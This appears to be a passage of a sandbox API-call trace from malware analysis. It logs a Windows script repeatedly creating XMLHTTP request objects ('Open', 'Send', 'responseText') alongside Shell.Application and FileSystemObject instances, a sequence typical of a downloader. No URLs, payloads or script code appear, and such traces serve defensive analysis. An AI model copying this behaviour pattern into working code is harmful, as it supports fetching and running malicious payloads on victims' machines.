	[0405.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0405.513] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0405.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.513] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0405.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0405.513] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0405.513] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.966] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0405.966] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0405.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0405.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0405.967] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0405.967] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0405.967] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0405.967] SysStringLen (param_1=0x0) returned 0x0
	[0405.967] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0405.967] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0405.968] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0405.968] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0405.968] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0405.968] ??2@YAPEAX_K@Z () returned 0x62f350
	[0405.968] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0405.968] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0405.968] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0405.968] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0405.968] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0405.968] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0405.968] SysStringLen (param_1=0x0) returned 0x0
	[0405.968] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0405.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0405.971] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0405.971] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0405.971] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0405.972] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0405.972] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0406.857] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0406.857] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0406.857] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0406.858] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0406.858] SysStringLen (param_1=0x0) returned 0x0
	[0406.858] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0406.858] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0406.858] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0406.859] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0406.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0406.859] ??2@YAPEAX_K@Z () returned 0x62f310
	[0406.859] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f310) 
	[0406.859] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0406.859] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0406.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0406.859] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0406.859] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.859] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0406.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0406.862] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0406.862] SysStringLen (param_1=0x0) returned 0x0
	[0406.862] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0406.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0406.863] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0406.863] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0406.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0406.863] ??2@YAPEAX_K@Z () returned 0x62f330
	[0406.863] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0406.863] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0406.863] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0406.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0406.863] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0406.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.863] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0406.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0406.864] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0406.864] SysStringLen (param_1=0x0) returned 0x0
	[0406.864] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0406.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0406.864] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0406.864] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0406.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0406.864] ??2@YAPEAX_K@Z () returned 0x62f310
	[0406.864] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0406.864] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0406.864] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0406.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0406.864] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0406.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0406.864] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0406.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0406.865] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0406.865] SysStringLen (param_1=0x0) returned 0x0
	[0406.865] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0406.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0406.865] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0406.865] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0406.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0406.865] ??2@YAPEAX_K@Z () returned 0x62f330
	[0406.866] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0406.866] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0406.866] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
